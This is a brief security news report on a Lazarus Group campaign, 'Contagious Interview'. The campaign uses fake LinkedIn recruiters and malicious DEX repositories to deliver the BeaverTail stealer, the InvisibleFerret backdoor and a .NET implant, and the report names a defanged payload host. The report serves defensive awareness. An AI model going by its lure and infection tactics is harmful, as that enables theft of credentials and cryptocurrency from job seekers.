The notorious Lazarus Group has launched a sophisticated cyber campaign targeting professionals through fake LinkedIn job opportunities in cryptocurrency and travel industries. The attack, capable of compromising Windows, macOS, and Linux systems, employs a multi-stage infection strategy.

The scam initiates with attractive job offers promising remote work flexibility and competitive compensation. Once candidates engage, attackers request CVs and GitHub repository links to harvest personal information. The scheme progresses when fraudulent recruiters share links to supposed decentralized exchange (DEX) project repositories on GitHub or Bitbucket.

The malware deployment occurs through:
– An obfuscated script retrieving payloads from api.npoint[.]io
– A cross-platform JavaScript information stealer targeting cryptocurrency wallet extensions
– A Python-based backdoor monitoring clipboard content and maintaining remote access

This campaign, identified as “Contagious Interview” (also known as DeceptiveDevelopment and DEV#POPPER), utilizes:
– BeaverTail: A JavaScript stealer
– InvisibleFerret: A Python implant
– A .NET binary capable of:
– Establishing TOR proxy communications
– Exfiltrating system information
– Deploying cryptocurrency miners
– Capturing keystrokes

The attack chain has been observed across LinkedIn and Reddit, with variations in approach, including requests to clone Web3 repositories or debug intentionally compromised code. The campaign continues to evolve, with attackers regularly modifying repository names and recruiter profiles to maintain effectiveness.